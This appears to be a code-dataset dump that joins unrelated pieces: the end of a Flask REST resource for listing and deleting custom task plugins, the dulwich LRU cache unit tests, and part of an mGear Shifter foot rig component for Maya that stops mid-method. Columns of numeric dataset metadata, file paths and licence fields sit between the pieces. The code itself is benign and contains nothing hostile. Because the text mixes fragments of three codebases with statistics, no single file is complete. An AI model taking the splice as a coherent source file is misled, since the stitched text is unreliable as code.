if task_plugin is None:
log.error(
"TaskPlugin not found",
task_plugin_name=taskPluginName,
collection="securingai_builtins",
)
raise TaskPluginDoesNotExistError
return task_plugin
@api.route("/securingai_custom")
class TaskPluginCustomCollectionResource(Resource):
"""Shows a list of all custom task plugins."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema(many=True), api=api)
def get(self) -> List[TaskPlugin]:
"""Gets a list of all registered custom task plugins."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginCustomCollection",
request_type="GET",
)
log.info("Request received")
return self._task_plugin_service.get_all_in_collection(
collection="securingai_custom",
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
@api.route("/securingai_custom/<string:taskPluginName>")
@api.param(
"taskPluginName",
"A unique string identifying a task plugin package within securingai_custom "
"collection.",
)
class TaskPluginCustomCollectionNameResource(Resource):
"""Shows a single custom task plugin package and lets you delete it."""
@inject
def __init__(self, *args, task_plugin_service: TaskPluginService, **kwargs) -> None:
self._task_plugin_service = task_plugin_service
super().__init__(*args, **kwargs)
@responds(schema=TaskPluginSchema, api=api)
def get(self, taskPluginName: str) -> TaskPlugin:
"""Gets a custom task plugin by its unique name."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginCustomCollectionName",
request_type="GET",
)
log.info("Request received")
task_plugin: Optional[
TaskPlugin
] = self._task_plugin_service.get_by_name_in_collection(
collection="securingai_custom",
task_plugin_name=taskPluginName,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
if task_plugin is None:
log.error(
"TaskPlugin not found",
task_plugin_name=taskPluginName,
collection="securingai_custom",
)
raise TaskPluginDoesNotExistError
return task_plugin
def delete(self, taskPluginName: str) -> Response:
"""Deletes a custom task plugin by its unique name."""
log: BoundLogger = LOGGER.new(
request_id=str(uuid.uuid4()),
resource="taskPluginCustomCollectionName",
task_plugin_name=taskPluginName,
request_type="DELETE",
)
log.info("Request received")
task_plugins: List[TaskPlugin] = self._task_plugin_service.delete(
collection="securingai_custom",
task_plugin_name=taskPluginName,
bucket=current_app.config["AI_PLUGINS_BUCKET"],
log=log,
)
name: List[str] = [x.task_plugin_name for x in task_plugins]
return jsonify( # type: ignore
dict(status="Success", collection="securingai_custom", taskPluginName=name)
)
| 37.789683
| 88
| 0.676888
| 1,065
| 9,523
| 5.844131
| 0.201878
| 0.086761
| 0.062821
| 0.043862
| 0.562661
| 0.503695
| 0.486343
| 0.486343
| 0.486343
| 0.486343
| 0
| 0.003009
| 0.23228
| 9,523
| 251
| 89
| 37.940239
| 0.848311
| 0.186076
| 0
| 0.57377
| 0
| 0
| 0.133655
| 0.029991
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0
| 0.076503
| 0
| 0.20765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714a5d7f1ebf03213e86c878b9d094ccb13ebf53
| 16,181
|
py
|
Python
|
dulwich/tests/test_lru_cache.py
|
mjmaenpaa/dulwich
|
d13a0375f4cc3099ff1c6edacda97f317c28f67a
|
[
"Apache-2.0"
] | null | null | null |
dulwich/tests/test_lru_cache.py
|
mjmaenpaa/dulwich
|
d13a0375f4cc3099ff1c6edacda97f317c28f67a
|
[
"Apache-2.0"
] | null | null | null |
dulwich/tests/test_lru_cache.py
|
mjmaenpaa/dulwich
|
d13a0375f4cc3099ff1c6edacda97f317c28f67a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2006, 2008 Canonical Ltd
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as public by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Tests for the lru_cache module."""
from dulwich import (
lru_cache,
)
from dulwich.tests import (
TestCase,
)
class TestLRUCache(TestCase):
"""Test that LRU cache properly keeps track of entries."""
def test_cache_size(self):
cache = lru_cache.LRUCache(max_cache=10)
self.assertEqual(10, cache.cache_size())
cache = lru_cache.LRUCache(max_cache=256)
self.assertEqual(256, cache.cache_size())
cache.resize(512)
self.assertEqual(512, cache.cache_size())
def test_missing(self):
cache = lru_cache.LRUCache(max_cache=10)
self.assertFalse('foo' in cache)
self.assertRaises(KeyError, cache.__getitem__, 'foo')
cache['foo'] = 'bar'
self.assertEqual('bar', cache['foo'])
self.assertTrue('foo' in cache)
self.assertFalse('bar' in cache)
def test_map_None(self):
# Make sure that we can properly map None as a key.
cache = lru_cache.LRUCache(max_cache=10)
self.assertFalse(None in cache)
cache[None] = 1
self.assertEqual(1, cache[None])
cache[None] = 2
self.assertEqual(2, cache[None])
# Test the various code paths of __getitem__, to make sure that we can
# handle when None is the key for the LRU and the MRU
cache[1] = 3
cache[None] = 1
cache[None]
cache[1]
cache[None]
self.assertEqual([None, 1], [n.key for n in cache._walk_lru()])
def test_add__null_key(self):
cache = lru_cache.LRUCache(max_cache=10)
self.assertRaises(ValueError, cache.add, lru_cache._null_key, 1)
def test_overflow(self):
"""Adding extra entries will pop out old ones."""
cache = lru_cache.LRUCache(max_cache=1, after_cleanup_count=1)
cache['foo'] = 'bar'
# With a max cache of 1, adding 'baz' should pop out 'foo'
cache['baz'] = 'biz'
self.assertFalse('foo' in cache)
self.assertTrue('baz' in cache)
self.assertEqual('biz', cache['baz'])
def test_by_usage(self):
"""Accessing entries bumps them up in priority."""
cache = lru_cache.LRUCache(max_cache=2)
cache['baz'] = 'biz'
cache['foo'] = 'bar'
self.assertEqual('biz', cache['baz'])
# This must kick out 'foo' because it was the last accessed
cache['nub'] = 'in'
self.assertFalse('foo' in cache)
def test_cleanup(self):
"""Test that we can use a cleanup function."""
cleanup_called = []
def cleanup_func(key, val):
cleanup_called.append((key, val))
cache = lru_cache.LRUCache(max_cache=2, after_cleanup_count=2)
cache.add('baz', '1', cleanup=cleanup_func)
cache.add('foo', '2', cleanup=cleanup_func)
cache.add('biz', '3', cleanup=cleanup_func)
self.assertEqual([('baz', '1')], cleanup_called)
# 'foo' is now most recent, so final cleanup will call it last
cache['foo']
cache.clear()
self.assertEqual([('baz', '1'), ('biz', '3'), ('foo', '2')],
cleanup_called)
def test_cleanup_on_replace(self):
"""Replacing an object should cleanup the old value."""
cleanup_called = []
def cleanup_func(key, val):
cleanup_called.append((key, val))
cache = lru_cache.LRUCache(max_cache=2)
cache.add(1, 10, cleanup=cleanup_func)
cache.add(2, 20, cleanup=cleanup_func)
cache.add(2, 25, cleanup=cleanup_func)
self.assertEqual([(2, 20)], cleanup_called)
self.assertEqual(25, cache[2])
# Even __setitem__ should make sure cleanup() is called
cache[2] = 26
self.assertEqual([(2, 20), (2, 25)], cleanup_called)
def test_len(self):
cache = lru_cache.LRUCache(max_cache=10, after_cleanup_count=10)
cache[1] = 10
cache[2] = 20
cache[3] = 30
cache[4] = 40
self.assertEqual(4, len(cache))
cache[5] = 50
cache[6] = 60
cache[7] = 70
cache[8] = 80
self.assertEqual(8, len(cache))
cache[1] = 15 # replacement
self.assertEqual(8, len(cache))
cache[9] = 90
cache[10] = 100
cache[11] = 110
# We hit the max
self.assertEqual(10, len(cache))
self.assertEqual([11, 10, 9, 1, 8, 7, 6, 5, 4, 3],
[n.key for n in cache._walk_lru()])
def test_cleanup_shrinks_to_after_clean_count(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=3)
cache.add(1, 10)
cache.add(2, 20)
cache.add(3, 25)
cache.add(4, 30)
cache.add(5, 35)
self.assertEqual(5, len(cache))
# This will bump us over the max, which causes us to shrink down to
# after_cleanup_cache size
cache.add(6, 40)
self.assertEqual(3, len(cache))
def test_after_cleanup_larger_than_max(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=10)
self.assertEqual(5, cache._after_cleanup_count)
def test_after_cleanup_none(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=None)
# By default _after_cleanup_count is 80% of the normal size
self.assertEqual(4, cache._after_cleanup_count)
def test_cleanup_2(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=2)
# Add these in order
cache.add(1, 10)
cache.add(2, 20)
cache.add(3, 25)
cache.add(4, 30)
cache.add(5, 35)
self.assertEqual(5, len(cache))
# Force a compaction
cache.cleanup()
self.assertEqual(2, len(cache))
def test_preserve_last_access_order(self):
cache = lru_cache.LRUCache(max_cache=5)
# Add these in order
cache.add(1, 10)
cache.add(2, 20)
cache.add(3, 25)
cache.add(4, 30)
cache.add(5, 35)
self.assertEqual([5, 4, 3, 2, 1], [n.key for n in cache._walk_lru()])
# Now access some randomly
cache[2]
cache[5]
cache[3]
cache[2]
self.assertEqual([2, 3, 5, 4, 1], [n.key for n in cache._walk_lru()])
def test_get(self):
cache = lru_cache.LRUCache(max_cache=5)
cache.add(1, 10)
cache.add(2, 20)
self.assertEqual(20, cache.get(2))
self.assertEqual(None, cache.get(3))
obj = object()
self.assertTrue(obj is cache.get(3, obj))
self.assertEqual([2, 1], [n.key for n in cache._walk_lru()])
self.assertEqual(10, cache.get(1))
self.assertEqual([1, 2], [n.key for n in cache._walk_lru()])
def test_keys(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=5)
cache[1] = 2
cache[2] = 3
cache[3] = 4
self.assertEqual([1, 2, 3], sorted(cache.keys()))
cache[4] = 5
cache[5] = 6
cache[6] = 7
self.assertEqual([2, 3, 4, 5, 6], sorted(cache.keys()))
def test_resize_smaller(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=4)
cache[1] = 2
cache[2] = 3
cache[3] = 4
cache[4] = 5
cache[5] = 6
self.assertEqual([1, 2, 3, 4, 5], sorted(cache.keys()))
cache[6] = 7
self.assertEqual([3, 4, 5, 6], sorted(cache.keys()))
# Now resize to something smaller, which triggers a cleanup
cache.resize(max_cache=3, after_cleanup_count=2)
self.assertEqual([5, 6], sorted(cache.keys()))
# Adding something will use the new size
cache[7] = 8
self.assertEqual([5, 6, 7], sorted(cache.keys()))
cache[8] = 9
self.assertEqual([7, 8], sorted(cache.keys()))
def test_resize_larger(self):
cache = lru_cache.LRUCache(max_cache=5, after_cleanup_count=4)
cache[1] = 2
cache[2] = 3
cache[3] = 4
cache[4] = 5
cache[5] = 6
self.assertEqual([1, 2, 3, 4, 5], sorted(cache.keys()))
cache[6] = 7
self.assertEqual([3, 4, 5, 6], sorted(cache.keys()))
cache.resize(max_cache=8, after_cleanup_count=6)
self.assertEqual([3, 4, 5, 6], sorted(cache.keys()))
cache[7] = 8
cache[8] = 9
cache[9] = 10
cache[10] = 11
self.assertEqual([3, 4, 5, 6, 7, 8, 9, 10], sorted(cache.keys()))
cache[11] = 12 # triggers cleanup back to new after_cleanup_count
self.assertEqual([6, 7, 8, 9, 10, 11], sorted(cache.keys()))
class TestLRUSizeCache(TestCase):
def test_basic_init(self):
cache = lru_cache.LRUSizeCache()
self.assertEqual(2048, cache._max_cache)
self.assertEqual(int(cache._max_size*0.8), cache._after_cleanup_size)
self.assertEqual(0, cache._value_size)
def test_add__null_key(self):
cache = lru_cache.LRUSizeCache()
self.assertRaises(ValueError, cache.add, lru_cache._null_key, 1)
def test_add_tracks_size(self):
cache = lru_cache.LRUSizeCache()
self.assertEqual(0, cache._value_size)
cache.add('my key', 'my value text')
self.assertEqual(13, cache._value_size)
def test_remove_tracks_size(self):
cache = lru_cache.LRUSizeCache()
self.assertEqual(0, cache._value_size)
cache.add('my key', 'my value text')
self.assertEqual(13, cache._value_size)
node = cache._cache['my key']
cache._remove_node(node)
self.assertEqual(0, cache._value_size)
def test_no_add_over_size(self):
"""Adding a large value may not be cached at all."""
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=5)
self.assertEqual(0, cache._value_size)
self.assertEqual({}, cache.items())
cache.add('test', 'key')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test': 'key'}, cache.items())
cache.add('test2', 'key that is too big')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test':'key'}, cache.items())
# If we would add a key, only to cleanup and remove all cached entries,
# then obviously that value should not be stored
cache.add('test3', 'bigkey')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test':'key'}, cache.items())
cache.add('test4', 'bikey')
self.assertEqual(3, cache._value_size)
self.assertEqual({'test':'key'}, cache.items())
def test_no_add_over_size_cleanup(self):
"""If a large value is not cached, we will call cleanup right away."""
cleanup_calls = []
def cleanup(key, value):
cleanup_calls.append((key, value))
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=5)
self.assertEqual(0, cache._value_size)
self.assertEqual({}, cache.items())
cache.add('test', 'key that is too big', cleanup=cleanup)
# key was not added
self.assertEqual(0, cache._value_size)
self.assertEqual({}, cache.items())
# and cleanup was called
self.assertEqual([('test', 'key that is too big')], cleanup_calls)
def test_adding_clears_cache_based_on_size(self):
"""The cache is cleared in LRU order until small enough"""
cache = lru_cache.LRUSizeCache(max_size=20)
cache.add('key1', 'value') # 5 chars
cache.add('key2', 'value2') # 6 chars
cache.add('key3', 'value23') # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache['key2'] # reference key2 so it gets a newer reference time
cache.add('key4', 'value234') # 8 chars, over limit
# We have to remove 2 keys to get back under limit
self.assertEqual(6+8, cache._value_size)
self.assertEqual({'key2':'value2', 'key4':'value234'},
cache.items())
def test_adding_clears_to_after_cleanup_size(self):
cache = lru_cache.LRUSizeCache(max_size=20, after_cleanup_size=10)
cache.add('key1', 'value') # 5 chars
cache.add('key2', 'value2') # 6 chars
cache.add('key3', 'value23') # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache['key2'] # reference key2 so it gets a newer reference time
cache.add('key4', 'value234') # 8 chars, over limit
# We have to remove 3 keys to get back under limit
self.assertEqual(8, cache._value_size)
self.assertEqual({'key4':'value234'}, cache.items())
def test_custom_sizes(self):
def size_of_list(lst):
return sum(len(x) for x in lst)
cache = lru_cache.LRUSizeCache(max_size=20, after_cleanup_size=10,
compute_size=size_of_list)
cache.add('key1', ['val', 'ue']) # 5 chars
cache.add('key2', ['val', 'ue2']) # 6 chars
cache.add('key3', ['val', 'ue23']) # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache['key2'] # reference key2 so it gets a newer reference time
cache.add('key4', ['value', '234']) # 8 chars, over limit
# We have to remove 3 keys to get back under limit
self.assertEqual(8, cache._value_size)
self.assertEqual({'key4':['value', '234']}, cache.items())
def test_cleanup(self):
cache = lru_cache.LRUSizeCache(max_size=20, after_cleanup_size=10)
# Add these in order
cache.add('key1', 'value') # 5 chars
cache.add('key2', 'value2') # 6 chars
cache.add('key3', 'value23') # 7 chars
self.assertEqual(5+6+7, cache._value_size)
cache.cleanup()
# Only the most recent fits after cleaning up
self.assertEqual(7, cache._value_size)
def test_keys(self):
cache = lru_cache.LRUSizeCache(max_size=10)
cache[1] = 'a'
cache[2] = 'b'
cache[3] = 'cdef'
self.assertEqual([1, 2, 3], sorted(cache.keys()))
def test_resize_smaller(self):
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=9)
cache[1] = 'abc'
cache[2] = 'def'
cache[3] = 'ghi'
cache[4] = 'jkl'
# Triggers a cleanup
self.assertEqual([2, 3, 4], sorted(cache.keys()))
# Resize should also cleanup again
cache.resize(max_size=6, after_cleanup_size=4)
self.assertEqual([4], sorted(cache.keys()))
# Adding should use the new max size
cache[5] = 'mno'
self.assertEqual([4, 5], sorted(cache.keys()))
cache[6] = 'pqr'
self.assertEqual([6], sorted(cache.keys()))
def test_resize_larger(self):
cache = lru_cache.LRUSizeCache(max_size=10, after_cleanup_size=9)
cache[1] = 'abc'
cache[2] = 'def'
cache[3] = 'ghi'
cache[4] = 'jkl'
# Triggers a cleanup
self.assertEqual([2, 3, 4], sorted(cache.keys()))
cache.resize(max_size=15, after_cleanup_size=12)
self.assertEqual([2, 3, 4], sorted(cache.keys()))
cache[5] = 'mno'
cache[6] = 'pqr'
self.assertEqual([2, 3, 4, 5, 6], sorted(cache.keys()))
cache[7] = 'stu'
self.assertEqual([4, 5, 6, 7], sorted(cache.keys()))
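# Usage sketch (illustrative only): the eviction behaviour the tests above exercise,
# shown standalone. Assumes the same `from dulwich import lru_cache` import as this
# module; the keys and values are arbitrary demo data.
demo_cache = lru_cache.LRUCache(max_cache=2, after_cleanup_count=2)
demo_cache["a"] = 1
demo_cache["b"] = 2
demo_cache["a"]  # touch "a" so that "b" becomes the least recently used entry
demo_cache["c"] = 3  # exceeds max_cache, so the LRU entry "b" is evicted
print(sorted(demo_cache.keys()))  # ['a', 'c']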
| 35.798673
| 79
| 0.603115
| 2,258
| 16,181
| 4.182905
| 0.136847
| 0.138168
| 0.044044
| 0.039598
| 0.574484
| 0.522499
| 0.463632
| 0.44648
| 0.40847
| 0.378295
| 0
| 0.046813
| 0.265991
| 16,181
| 451
| 80
| 35.878049
| 0.748421
| 0.17743
| 0
| 0.522152
| 0
| 0
| 0.040467
| 0
| 0
| 0
| 0
| 0
| 0.310127
| 1
| 0.110759
| false
| 0
| 0.006329
| 0.003165
| 0.126582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
714cfc19c240490817e3657df9cb9287844afbb6
| 16,391
|
py
|
Python
|
release/scripts/mgear/shifter_epic_components/EPIC_foot_01/__init__.py
|
lsica-scopely/mgear4
|
28ed5d66370a9516da05d93d447bfc15f4c0c9f4
|
[
"MIT"
] | null | null | null |
release/scripts/mgear/shifter_epic_components/EPIC_foot_01/__init__.py
|
lsica-scopely/mgear4
|
28ed5d66370a9516da05d93d447bfc15f4c0c9f4
|
[
"MIT"
] | null | null | null |
release/scripts/mgear/shifter_epic_components/EPIC_foot_01/__init__.py
|
lsica-scopely/mgear4
|
28ed5d66370a9516da05d93d447bfc15f4c0c9f4
|
[
"MIT"
] | null | null | null |
import pymel.core as pm
import ast
from pymel.core import datatypes
from mgear.shifter import component
from mgear.core import node, applyop, vector
from mgear.core import attribute, transform, primitive
class Component(component.Main):
"""Shifter component Class"""
# =====================================================
# OBJECTS
# =====================================================
def addObjects(self):
"""Add all the objects needed to create the component."""
# joint Description Names
jd_names = ast.literal_eval(
self.settings["jointNamesDescription_custom"]
)
jdn_ball = jd_names[0]
self.up_axis = pm.upAxis(q=True, axis=True)
self.div_count = len(self.guide.apos) - 5
plane = [self.guide.apos[0], self.guide.apos[-4], self.guide.apos[-3]]
self.normal = self.getNormalFromPos(plane)
self.binormal = self.getBiNormalFromPos(plane)
# Heel ---------------------------------------------
# bank pivot
t = transform.getTransformLookingAt(
self.guide.pos["heel"],
self.guide.apos[-4],
self.normal,
"xz",
self.negate,
)
t = transform.setMatrixPosition(t, self.guide.pos["inpivot"])
self.in_npo = primitive.addTransform(
self.root, self.getName("in_npo"), t
)
self.in_piv = primitive.addTransform(
self.in_npo, self.getName("in_piv"), t
)
t = transform.setMatrixPosition(t, self.guide.pos["outpivot"])
self.out_piv = primitive.addTransform(
self.in_piv, self.getName("out_piv"), t
)
# heel
t = transform.getTransformLookingAt(
self.guide.pos["heel"],
self.guide.apos[-4],
self.normal,
"xz",
self.negate,
)
self.heel_loc = primitive.addTransform(
self.out_piv, self.getName("heel_loc"), t
)
attribute.setRotOrder(self.heel_loc, "YZX")
self.heel_ctl = self.addCtl(
self.heel_loc,
"heel_ctl",
t,
self.color_ik,
"sphere",
w=self.size * 0.1,
tp=self.parentCtlTag,
)
attribute.setKeyableAttributes(self.heel_ctl, self.r_params)
# Tip ----------------------------------------------
if self.up_axis == "y":
v = datatypes.Vector(
self.guide.apos[-5].x,
self.guide.pos["heel"].y,
self.guide.apos[-5].z,
)
else:
v = datatypes.Vector(
self.guide.apos[-5].x,
self.guide.apos[-5].y,
self.guide.pos["heel"].z,
)
t = transform.setMatrixPosition(t, v)
self.tip_ctl = self.addCtl(
self.heel_ctl,
"tip_ctl",
t,
self.color_ik,
"circle",
w=self.size,
tp=self.heel_ctl,
)
attribute.setKeyableAttributes(self.tip_ctl, self.r_params)
# Roll ---------------------------------------------
if self.settings["useRollCtl"]:
t = transform.getTransformLookingAt(
self.guide.pos["heel"],
self.guide.apos[-4],
self.normal,
"xz",
self.negate,
)
t = transform.setMatrixPosition(t, self.guide.pos["root"])
self.roll_np = primitive.addTransform(
self.root, self.getName("roll_npo"), t
)
self.roll_ctl = self.addCtl(
self.roll_np,
"roll_ctl",
t,
self.color_ik,
"cylinder",
w=self.size * 0.5,
h=self.size * 0.5,
ro=datatypes.Vector(3.1415 * 0.5, 0, 0),
tp=self.tip_ctl,
)
attribute.setKeyableAttributes(self.roll_ctl, ["rx", "rz"])
# Backward Controllers ------------------------------
bk_pos = self.guide.apos[1:-3]
bk_pos.reverse()
parent = self.tip_ctl
self.bk_ctl = []
self.bk_loc = []
self.previousTag = self.tip_ctl
for i, pos in enumerate(bk_pos):
if i == 0:
t = transform.getTransform(self.heel_ctl)
t = transform.setMatrixPosition(t, pos)
else:
direction = bk_pos[i - 1]
t = transform.getTransformLookingAt(
pos, direction, self.normal, "xz", self.negate
)
bk_loc = primitive.addTransform(
parent, self.getName("bk%s_loc" % i), t
)
bk_ctl = self.addCtl(
bk_loc,
"bk%s_ctl" % i,
t,
self.color_ik,
"sphere",
w=self.size * 0.15,
tp=self.previousTag,
)
attribute.setKeyableAttributes(bk_ctl, self.r_params)
self.previousTag = bk_ctl
self.bk_loc.append(bk_loc)
self.bk_ctl.append(bk_ctl)
parent = bk_ctl
# FK Reference ------------------------------------
self.fk_ref = primitive.addTransformFromPos(
self.bk_ctl[-1], self.getName("fk_ref"), self.guide.apos[0]
)
self.fk_npo = primitive.addTransform(
self.fk_ref,
self.getName("fk0_npo"),
transform.getTransform(self.bk_ctl[-1]),
)
# Forward Controllers ------------------------------
self.fk_ctl = []
self.fk_loc = []
parent = self.fk_npo
self.previousTag = self.tip_ctl
for i, bk_ctl in enumerate(reversed(self.bk_ctl[1:])):
if i == len(self.bk_ctl) - 2:
t = transform.getTransform(self.tip_ctl)
v = transform.getTranslation(bk_ctl)
t = transform.setMatrixPosition(t, v)
else:
t = transform.getTransform(bk_ctl)
dist = vector.getDistance(
self.guide.apos[i + 1], self.guide.apos[i + 2]
)
fk_loc = primitive.addTransform(
parent, self.getName("fk%s_loc" % i), t
)
po_vec = datatypes.Vector(dist * 0.5 * self.n_factor, 0, 0)
fk_ctl = self.addCtl(
fk_loc,
"fk%s_ctl" % i,
t,
self.color_fk,
"cube",
w=dist,
h=self.size * 0.5,
d=self.size * 0.5,
po=po_vec,
tp=self.previousTag,
)
self.previousTag = fk_ctl
attribute.setKeyableAttributes(fk_ctl)
if i:
name = jdn_ball + str(i)
else:
name = jdn_ball
self.jnt_pos.append([fk_ctl, name])
parent = fk_ctl
self.fk_ctl.append(fk_ctl)
self.fk_loc.append(fk_loc)
# =====================================================
# ATTRIBUTES
# =====================================================
def addAttributes(self):
"""Create the anim and setupr rig attributes for the component"""
# Anim -------------------------------------------
# Roll Angles
if not self.settings["useRollCtl"]:
self.roll_att = self.addAnimParam(
"roll", "Roll", "double", 0, -180, 180
)
self.bank_att = self.addAnimParam(
"bank", "Bank", "double", 0, -180, 180
)
self.angles_att = [
self.addAnimParam("angle_%s" % i, "Angle %s" % i, "double", -20)
for i in range(self.div_count)
]
# Setup ------------------------------------------
self.blend_att = self.addSetupParam(
"blend", "Fk/Ik Blend", "double", 1, 0, 1
)
# =====================================================
# OPERATORS
# =====================================================
def addOperators(self):
"""Create operators and set the relations for the component rig
Apply operators, constraints, expressions to the hierarchy.
In order to keep the code clean and easier to debug,
we shouldn't create any new object in this method.
"""
# Visibilities -------------------------------------
try:
# ik
if self.settings["useRollCtl"]:
for shp in self.roll_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
for bk_ctl in self.bk_ctl:
for shp in bk_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
for shp in self.heel_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
for shp in self.tip_ctl.getShapes():
pm.connectAttr(self.blend_att, shp.attr("visibility"))
except RuntimeError:
pm.displayInfo("Visibility already connect")
# Roll / Bank --------------------------------------
if self.settings["useRollCtl"]: # Using the controler
self.roll_att = self.roll_ctl.attr("rz")
self.bank_att = self.roll_ctl.attr("rx")
clamp_node = node.createClampNode(
[self.roll_att, self.bank_att, self.bank_att],
[0, -180, 0],
[180, 0, 180],
)
inAdd_nod = node.createAddNode(
clamp_node.outputB,
pm.getAttr(self.in_piv.attr("rx")) * self.n_factor,
)
pm.connectAttr(clamp_node.outputR, self.heel_loc.attr("rz"))
pm.connectAttr(clamp_node.outputG, self.out_piv.attr("rx"))
pm.connectAttr(inAdd_nod.output, self.in_piv.attr("rx"))
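# Added clarification: the clamp above splits the single roll/bank inputs
# into three channels, so outputR (roll clamped to [0, 180]) drives the
# heel rz, outputG (bank clamped to [-180, 0]) drives the out pivot rx, and
# outputB (bank clamped to [0, 180]), offset by the in pivot's rest rx,
# drives the in pivot rx.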
# Reverse Controller offset -------------------------
angle_outputs = node.createAddNodeMulti(self.angles_att)
for i, bk_loc in enumerate(reversed(self.bk_loc)):
if i == 0: # First
inpu = self.roll_att
min_input = self.angles_att[i]
elif i == len(self.angles_att): # Last
sub_nod = node.createSubNode(
self.roll_att, angle_outputs[i - 1]
)
inpu = sub_nod.output
min_input = -360
else: # Others
sub_nod = node.createSubNode(
self.roll_att, angle_outputs[i - 1]
)
inpu = sub_nod.output
min_input = self.angles_att[i]
clamp_node = node.createClampNode(inpu, min_input, 0)
add_node = node.createAddNode(
clamp_node.outputR, bk_loc.getAttr("rz")
)
pm.connectAttr(add_node.output, bk_loc.attr("rz"))
# Reverse compensation -----------------------------
for i, fk_loc in enumerate(self.fk_loc):
bk_ctl = self.bk_ctl[-i - 1]
bk_loc = self.bk_loc[-i - 1]
fk_ctl = self.fk_ctl[i]
# Inverse Rotorder
o_node = applyop.gear_inverseRotorder_op(bk_ctl, fk_ctl)
pm.connectAttr(o_node.output, bk_loc.attr("ro"))
pm.connectAttr(fk_ctl.attr("ro"), fk_loc.attr("ro"))
attribute.lockAttribute(bk_ctl, "ro")
# Compensate the backward rotation
# ik
addx_node = node.createAddNode(
bk_ctl.attr("rx"), bk_loc.attr("rx")
)
addy_node = node.createAddNode(
bk_ctl.attr("ry"), bk_loc.attr("ry")
)
addz_node = node.createAddNode(
bk_ctl.attr("rz"), bk_loc.attr("rz")
)
addz_node = node.createAddNode(
addz_node.output, -bk_loc.getAttr("rz") - fk_loc.getAttr("rz")
)
neg_node = node.createMulNode(
[addx_node.output, addy_node.output, addz_node.output],
[-1, -1, -1],
)
add_node = node.createAddNode(
neg_node.outputY.get() * -1, neg_node.outputY
)
ik_outputs = [neg_node.outputX, add_node.output, neg_node.outputZ]
# fk
fk_outputs = [0, 0, fk_loc.getAttr("rz")]
# blend
blend_node = node.createBlendNode(
ik_outputs, fk_outputs, self.blend_att
)
pm.connectAttr(blend_node.output, fk_loc.attr("rotate"))
return
# =====================================================
# CONNECTOR
# =====================================================
def setRelation(self):
"""Set the relation beetween object from guide to rig"""
self.relatives["root"] = self.fk_ctl[0]
self.relatives["heel"] = self.fk_ctl[0]
self.relatives["inpivot"] = self.fk_ctl[0]
self.relatives["outpivot"] = self.fk_ctl[0]
self.controlRelatives["root"] = self.fk_ctl[0]
self.controlRelatives["heel"] = self.fk_ctl[0]
self.controlRelatives["inpivot"] = self.fk_ctl[0]
self.controlRelatives["outpivot"] = self.fk_ctl[0]
self.jointRelatives["root"] = 0
self.jointRelatives["heel"] = 0
self.jointRelatives["inpivot"] = 0
self.jointRelatives["outpivot"] = 0
for i in range(self.div_count):
self.relatives["%s_loc" % i] = self.fk_ctl[i]
self.jointRelatives["%s_loc" % i] = i
if self.div_count > 0:
self.relatives["%s_loc" % self.div_count] = self.fk_ctl[-1]
self.jointRelatives["%s_loc" % self.div_count] = self.div_count - 1
def addConnection(self):
"""Add more connection definition to the set"""
self.connections["EPIC_leg_01"] = self.connect_leg_2jnt_01
self.connections["leg_2jnt_01"] = self.connect_leg_2jnt_01
self.connections["leg_ms_2jnt_01"] = self.connect_leg_ms_2jnt_01
self.connections["leg_3jnt_01"] = self.connect_leg_3jnt_01
def connect_leg_2jnt_01(self):
"""Connector for leg 2jnt"""
# If the parent component hasn't been generated we skip the connection
if self.parent_comp is None:
return
pm.connectAttr(self.parent_comp.blend_att, self.blend_att)
pm.parent(self.root, self.parent_comp.ik_ctl)
pm.parent(self.parent_comp.ik_ref, self.bk_ctl[-1])
pm.parentConstraint(
self.parent_comp.tws2_rot, self.fk_ref, maintainOffset=True
)
return
def connect_leg_ms_2jnt_01(self):
"""Connector for leg ms 2jnt"""
